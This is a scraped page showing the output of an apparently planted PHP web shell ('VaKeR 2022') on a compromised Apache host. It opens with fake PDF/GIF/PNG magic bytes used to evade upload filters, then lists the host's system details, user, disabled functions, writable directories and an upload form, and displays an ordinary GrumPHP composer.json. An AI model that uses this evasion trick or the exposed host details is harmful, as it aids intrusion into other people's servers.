%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/admin1/vendor/phpro/grumphp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/admin1/vendor/phpro/grumphp/composer.json
{
    "name": "phpro/grumphp",
    "description": "A composer plugin that enables source code quality checks.",
    "license": "MIT",
    "type": "composer-plugin",
    "authors": [
        {
            "name": "Toon Verwerft",
            "email": "toon.verwerft@phpro.be"
        },
        {
            "name": "Community",
            "homepage": "https://github.com/phpro/grumphp/graphs/contributors"
        }
    ],
    "require": {
        "php": "^8.0",
        "ext-json": "*",
        "composer-plugin-api": "~2.0",
        "amphp/amp": "^2.6",
        "amphp/parallel": "^1.4",
        "amphp/parallel-functions": "^1.1",
        "doctrine/collections": "^1.6.8 || ^2.0",
        "gitonomy/gitlib": "^1.3",
        "laravel/serializable-closure": "^1.1",
        "monolog/monolog": "^2.0 || ^3.0",
        "ondram/ci-detector": "^4.0",
        "psr/container": "^1.1 || ^2.0",
        "seld/jsonlint": "~1.8",
        "symfony/config": "~5.4 || ~6.0",
        "symfony/console": "~5.4 || ~6.0",
        "symfony/dependency-injection": "~5.4 || ~6.0",
        "symfony/dotenv": "~5.4 || ~6.0",
        "symfony/event-dispatcher": "~5.4 || ~6.0",
        "symfony/filesystem": "~5.4 || ~6.0",
        "symfony/finder": "~5.4 || ~6.0",
        "symfony/options-resolver": "~5.4 || ~6.0",
        "symfony/process": "~5.4 || ~6.0",
        "symfony/yaml": "~5.4 || ~6.0"
    },
    "require-dev": {
        "amphp/sync": "^v1.4",
        "brianium/paratest": "^6.4",
        "composer/composer": "^2.2.6",
        "nikic/php-parser": "~4.13",
        "php-parallel-lint/php-parallel-lint": "^1.3",
        "phpspec/phpspec": "^7.2",
        "phpspec/prophecy-phpunit": "^2.0",
        "phpunit/phpunit": "^9.5.13"
    },
    "suggest": {
        "atoum/atoum": "Lets GrumPHP run your unit tests.",
        "behat/behat": "Lets GrumPHP validate your project features.",
        "brianium/paratest": "Lets GrumPHP run PHPUnit in parallel.",
        "codeception/codeception": "Lets GrumPHP run your project's full stack tests",
        "consolidation/robo": "Lets GrumPHP run your automated PHP tasks.",
        "designsecurity/progpilot": "Lets GrumPHP be sure that there are no vulnerabilities in your code.",
        "doctrine/orm": "Lets GrumPHP validate your Doctrine mapping files.",
        "enlightn/security-checker": "Lets GrumPHP be sure that there are no known security issues.",
        "ergebnis/composer-normalize": "Lets GrumPHP tidy and normalize your composer.json file.",
        "friendsofphp/php-cs-fixer": "Lets GrumPHP automatically fix your codestyle.",
        "friendsoftwig/twigcs": "Lets GrumPHP check Twig coding standard.",
        "infection/infection": "Lets GrumPHP evaluate the quality your unit tests",
        "maglnet/composer-require-checker": "Lets GrumPHP analyze composer dependencies.",
        "malukenho/kawaii-gherkin": "Lets GrumPHP lint your Gherkin files.",
        "nette/tester": "Lets GrumPHP run your unit tests with nette tester.",
        "nikic/php-parser": "Lets GrumPHP run static analyses through your PHP files.",
        "pestphp/pest": "Lets GrumPHP run your unit test with Pest PHP",
        "phan/phan": "Lets GrumPHP unleash a static analyzer on your code",
        "phing/phing": "Lets GrumPHP run your automated PHP tasks.",
        "php-parallel-lint/php-parallel-lint": "Lets GrumPHP quickly lint your entire code base.",
        "phparkitect/phparkitect": "Let GrumPHP keep your codebase coherent and solid, by permitting to add some architectural constraint check to your workflow.",
        "phpmd/phpmd": "Lets GrumPHP sort out the mess in your code",
        "phpspec/phpspec": "Lets GrumPHP spec your code.",
        "phpstan/phpstan": "Lets GrumPHP discover bugs in your code without running it.",
        "phpunit/phpunit": "Lets GrumPHP run your unit tests.",
        "povils/phpmnd": "Lets GrumPHP help you detect magic numbers in PHP code.",
        "rector/rector ": "Lets GrumPHP instantly upgrade and automatically refactor your PHP code.",
        "roave/security-advisories": "Lets GrumPHP be sure that there are no known security issues.",
        "sebastian/phpcpd": "Lets GrumPHP find duplicated code.",
        "squizlabs/php_codesniffer": "Lets GrumPHP sniff on your code.",
        "sstalle/php7cc": "Lets GrumPHP check PHP 5.3 - 5.6 code compatibility with PHP 7.",
        "symfony/phpunit-bridge": "Lets GrumPHP run your unit tests with the phpunit-bridge of Symfony.",
        "symplify/easy-coding-standard": "Lets GrumPHP check coding standard.",
        "vimeo/psalm": "Lets GrumPHP discover errors in your code without running it."
    },
    "autoload": {
        "psr-4": {
            "GrumPHP\\": "src"
        }
    },
    "autoload-dev": {
        "psr-4": {
            "GrumPHPTest\\": "test"
        }
    },
    "bin": [
        "bin/grumphp"
    ],
    "config": {
        "sort-packages": true
    },
    "extra": {
        "class": "GrumPHP\\Composer\\GrumPHPPlugin"
    },
    "scripts": {
        "post-install-cmd": [
            "GrumPHP\\Composer\\DevelopmentIntegrator::integrate"
        ],
        "post-update-cmd": [
            "GrumPHP\\Composer\\DevelopmentIntegrator::integrate"
        ]
    }
}

VaKeR 2022